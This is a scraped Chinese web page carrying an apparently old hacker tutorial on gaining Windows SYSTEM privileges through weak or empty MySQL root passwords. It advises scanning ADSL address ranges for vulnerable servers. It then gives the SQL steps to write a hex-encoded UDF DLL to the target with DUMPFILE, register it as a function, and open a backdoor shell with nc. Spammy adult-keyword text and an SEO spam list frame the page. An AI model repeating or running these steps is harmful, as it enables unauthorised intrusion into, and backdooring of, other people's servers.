国产成人精品亚洲777人妖,欧美日韩精品一区视频,最新亚洲国产,国产乱码精品一区二区亚洲

您的位置:首頁技術(shù)文章
文章詳情頁

由mysql弱口令取得windows的system權(quán)限的實戰(zhàn)

瀏覽:43日期:2024-02-10 17:30:58

今年五月mix在幻影論壇公布了一篇關(guān)于mysql入侵的文章(<執(zhí)行系統(tǒng)命令>>,連接地址http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006),反應(yīng)強烈.隨

后不久,黑客基地古典辣m做了個演示動畫,可惜其中的用到mysql.txt并沒有公布,造成很多不熟悉mysql的

人不能實戰(zhàn)入侵mysql. 其實通過注冊mysql 的UDF DLL中自寫的Function而執(zhí)行任意命令早在去年12月已經(jīng)公布了,參看文章

http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=33331而mix實現(xiàn)直接從mysql客戶端傳送二

進制文件進入服務(wù)端硬盤中,不得不說是一個了不起的發(fā)現(xiàn)!下面我來說說我的入侵實戰(zhàn)!

1.打開hscan1.2掃描一段ip,我推薦大家掃描adsl所在的ip段,因為這些段ip的主人安全意思差,從而

能掃到大量的mysql的root口令為空且有訪問mysql默認數(shù)據(jù)庫mysql的權(quán)限. 2.在自己的機器上裝個mysql for windows.下載地址

http://download.pchome.net/internet/server/dbserver/2506.html 3.在幻影論壇下載個my_udf.dll或者mix.dll(我比較偏好my_udf.dll,因為mix.dll會造成mysql假

死). 4.運行winhex,打開my_udf.dll,點edit菜單下面的copy all選hex values;打開記事本,點粘貼,這樣

就把十六進制的my_udf.dll復(fù)制進去了! 5.再打開另外個記事本寫入如下語句: use mysql; set @a=concat('',0x...) create table Mix(data LONGBLOB); insert into Mix values('');update Mix set data = @a; select data from Mix into DUMPFILE 'c:my_udf.dll'; CREATE FUNCTION my_udfdoor RETURNS STRING SONAME 'c:my_udf.dll'; select my_udfdoor(''); 6.把第四步中記事本上的十六進制數(shù)據(jù)復(fù)制出來替換掉第5步中第二行語句中的'...',并保存到c盤根

目錄下面,命名為mysql.txt. 7.在本地打開一個dos命令窗口,跳轉(zhuǎn)到mysql安裝目錄下面,輸入mysql -h218.1.1.1 -uroot -p123 (注意,把218.1.1.1,root,123分別替換為你的hscan掃描到的ip,username,password的值.如果password的

值為空,則可以不需要參數(shù)-p); 8.在第7步中連接成功遠程mysql服務(wù)器的話,就輸入 . c:mysql.txt并敲一下回車.如果遠程mysql

是運行在windows操作系統(tǒng)下的且你掃描到的mysql帳號權(quán)限足夠高的話,就會成功在遠程服務(wù)器上裝上你

的后門. 9.最后用nc來連接此服務(wù)器的3306端口,并輸入密碼fuck,按回車,如果shell沒有出來,就多敲幾次回

車.如果還是不出shell,那就換個目標(biāo)試一試吧.

標(biāo)簽: Windows系統(tǒng)
相關(guān)文章:
主站蜘蛛池模板: 岢岚县| 忻州市| 正阳县| 临潭县| 大丰市| 三门峡市| 龙井市| 灌阳县| 新密市| 大厂| 清涧县| 泸水县| 宜良县| 阿巴嘎旗| 密云县| 台南市| 嵊州市| 焦作市| 永顺县| 班玛县| 甘孜| 安西县| 翁牛特旗| 庄河市| 永丰县| 志丹县| 四子王旗| 馆陶县| 晋中市| 永仁县| 仁寿县| 闽侯县| 扬州市| 乌鲁木齐县| 芒康县| 仁布县| 高阳县| 墨江| 新龙县| 文昌市| 禹城市|